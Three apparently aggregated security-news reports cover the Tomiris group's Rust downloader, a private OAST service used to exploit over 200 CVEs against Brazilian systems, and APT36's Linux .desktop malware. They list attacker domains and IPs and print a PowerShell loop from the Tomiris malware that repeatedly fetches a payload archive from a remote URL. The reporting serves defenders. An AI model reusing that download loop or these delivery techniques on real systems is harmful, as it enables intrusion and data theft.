The Tomiris hacker group has resurfaced with a sophisticated campaign targeting foreign ministries and government entities worldwide.

Beginning in early 2025, this advanced persistent threat (APT) actor shifted its operational strategy to focus on high-value diplomatic infrastructure.

By leveraging a diverse array of programming languages—including Go, Rust, C/C++, and Python—the group has enhanced its ability to bypass traditional security measures while maintaining a low profile within compromised networks and persistent environments.

These attacks typically commence with precision spear-phishing emails containing password-protected archives.

Attackers frequently disguise malicious executables with double extensions or mislead victims using office document icons, ensuring that the initial infection vector remains obscured.

The passwords for these archives often follow a predictable pattern, such as “min@2025,” yet this simple obfuscation effectively bypasses automated email scanners.

Once executed, these payloads initiate a chain of events designed to establish persistence and deploy further malicious tools and backdoors.

Securelist security analysts noted that Tomiris has increasingly adopted public services like Telegram and Discord for command-and-control (C2) communications.

This tactical evolution allows malicious traffic to blend seamlessly with legitimate network activity, complicating detection efforts and strategies used by security teams.

Furthermore, the group has begun deploying open-source post-exploitation frameworks such as Havoc and AdaptixC2, signaling a move toward more modular and resilient attack chains.

The analysts emphasized that this blend of custom implants and open-source tools makes attribution and mitigation significantly more challenging for defenders.

The Rust Downloader Mechanism

A standout component of this campaign is the previously undocumented Tomiris Rust Downloader. Unlike typical data exfiltration tools, this implant performs targeted reconnaissance by scanning specific drives for sensitive file types, including .pdf, .docx, and .xlsx.

Interestingly, it does not immediately steal these files; instead, it compiles a list of file paths and transmits this data to a Discord webhook using a multipart POST request.

The malware employs a “payload_json” field for system information and a “file” field for the path list, ensuring structured data exfiltration.

The malware is programmed to avoid detection by ignoring specific directories such as “Program Files,” “Windows,” and “AppData.”

Upon successfully sending the file list, the downloader creates a Visual Basic script (script.vbs) that executes a PowerShell script (script.ps1).

This script contains a loop that attempts to retrieve a secondary payload—often a ZIP archive containing further executables—every minute.

while($true){
    try{
        $Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
        iwr -OutFile $env:Temp\1.zip -Uri $dUrl
        New-Item -Path $env:TEMP\rfolder -ItemType Directory
        break
    }catch{
        Start-Sleep -Seconds 60
    }
}

This meticulous approach to reconnaissance and staged delivery highlights the group’s intent to remain undetected while systematically identifying high-value data for future exfiltration and exploitation.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally appeared first on Cyber Security News.

A new threat has emerged in the cybersecurity landscape as security experts discover a private Out-of-Band Application Security Testing (OAST) service operating on Google Cloud infrastructure.

This mystery operation stands out from typical exploit scanning activities because it uses custom infrastructure rather than relying on public services. The attackers have been running a focused campaign that targets specific regions with over 200 different vulnerabilities.

Between October and November 2025, researchers observed roughly 1,400 exploit attempts spanning more than 200 CVEs linked to this operation.

Unlike most attackers who use public OAST services like oast.fun or interact.sh, this threat actor operates their own private OAST domain at detectors-testing.com.

This unusual setup caught attention when callbacks started appearing to subdomains of i-sh.detectors-testing.com, a domain not associated with any known OAST provider or popular scanning framework.

VulnCheck security researchers identified this operation after noticing unusual patterns in their Canary Intelligence traffic.

The campaign combines standard Nuclei scanning templates with custom payloads to expand their reach. What makes this operation particularly interesting is that all observed activity targeted systems deployed in Brazil, suggesting a clear regional focus.

While the same attacker IP addresses were flagged in Serbia and Turkey through AbuseIPDB reports, VulnCheck’s dataset showed activity concentrated entirely on Brazilian targets.

The infrastructure behind this operation consists of multiple Google Cloud IP addresses, with six addresses used as exploit scanners and one as the OAST host.

Using Google Cloud provides practical advantages for attackers since defenders rarely block major US cloud providers, and traffic to Google networks easily blends with normal background communication.

The operation has been running since at least November 2024, indicating a long-term sustained effort rather than quick opportunistic scans.

Evidence from an open directory on port 9000 revealed a modified Java class file called TouchFile.class, originally documented in Fastjson 1.2.47 exploitation examples.

The attackers extended the basic version to accept custom commands and HTTP requests through parameters, showing they actively modify publicly available exploit tools rather than using them unchanged.

The decompiled code shows that if no parameters are provided, it runs a default command to touch /tmp/success3125, but when cmd or http parameters are present, it executes those commands or makes outbound HTTP requests instead.

Technical Breakdown of the Exploit Mechanism

The attackers use a mix of current and outdated Nuclei templates to probe for vulnerabilities. One example is the old grafana-file-read.yaml template, which was removed from the official nuclei-templates repository in early October 2025.

Finding this older template in active use suggests the attackers either use third-party Nuclei-based scanners like dddd or simply have not updated their scanning tools.

This combination of old and new templates helps them cast a wider net across different vulnerability types.

The exploit payloads follow a standard pattern where successful exploitation triggers the compromised host to make HTTP requests back to the attacker-controlled OAST subdomains.

For instance, in an attempt against CVE-2025-4428 affecting Ivanti Endpoint Manager Mobile, the payload would force the victim system to contact d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com.

This callback mechanism allows attackers to verify which systems are vulnerable without needing direct access, making detection more challenging for defenders.

The OAST host at 34.136.22.26 consistently presents Interactsh services across ports 80, 443, and 389, confirming its role as a dedicated command and control endpoint for collecting exploit verification callbacks from compromised systems worldwide.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Mystery OAST With Exploit for 200 CVEs Leveraging Google Cloud to Launch Attacks appeared first on Cyber Security News.

Pakistan-based threat actor APT36, also known as Transparent Tribe, has launched a sophisticated cyber-espionage campaign against Indian government institutions using a newly developed Python-based ELF malware.

The attack marks a significant escalation in the group’s capabilities, demonstrating their growing technical maturity and adaptability to Linux-based operating systems.

The campaign centers on spear-phishing emails containing weaponized Linux shortcut files designed to deceive government employees.

When recipients extract and open these files, the malware silently downloads and executes malicious components in the background while displaying seemingly harmless content to the user.

This dual-layer approach allows the attackers to maintain stealth while establishing persistent access to critical infrastructure. APT36’s shift toward Linux targeting represents a strategic evolution in their operational doctrine.

The group has historically focused on Windows-based attacks, but this new campaign reveals their commitment to targeting the BOSS operating system, which is widely deployed across Indian government agencies.

By adapting their tools to exploit multiple platforms, the threat actors significantly expand their attack surface and operational effectiveness.

Cyfirma security analysts identified the malware after discovering the weaponized .desktop files being distributed through targeted phishing campaigns.

The researchers noted that the infection chain begins with a deceptive archive file containing the malicious shortcut, which triggers a multi-stage payload delivery process.

Once executed, the shortcut downloads a decoy PDF document to distract the user while simultaneously fetching and installing the actual ELF malware payload from attacker-controlled servers.

Malware’s infection mechanism

The malware’s infection mechanism relies on .desktop files as intermediary delivery vectors, allowing the threat actors to conceal their malicious intent while maintaining flexibility in payload deployment.

Unlike directly transmitting ELF binaries, which security systems can more easily detect, .desktop files appear legitimate to Linux users while running embedded commands.

Source code of the bash file (Source – Cyfirma)

This approach enables dynamic payload retrieval and significantly reduces forensic evidence.

Analysis of the extracted malware reveals a feature-rich remote access tool capable of executing arbitrary shell commands, establishing command-and-control communication, capturing screenshots, and exfiltrating data.

The malware uses systemd user-level services to establish persistence, ensuring it continues running across system reboots and user sessions.

Researchers discovered that the threat actor strategically uses the .desktop file format combined with shell script execution to bypass traditional security controls and maintain undetected presence.

The campaign infrastructure uses recently registered domains and compromised servers located in multiple countries.

The malicious domain lionsdenim[.]xyz, registered just 22 days prior, combined with IP address 185.235.137.90 in Frankfurt, facilitates payload delivery.

Indian government agencies should implement immediate mitigation measures, including enhanced email security, endpoint detection and response solutions, and strict application authorization policies to counter this persistent threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post APT36 Hackers Used Python-Based ELF Malware to Target Indian Government Entities appeared first on Cyber Security News.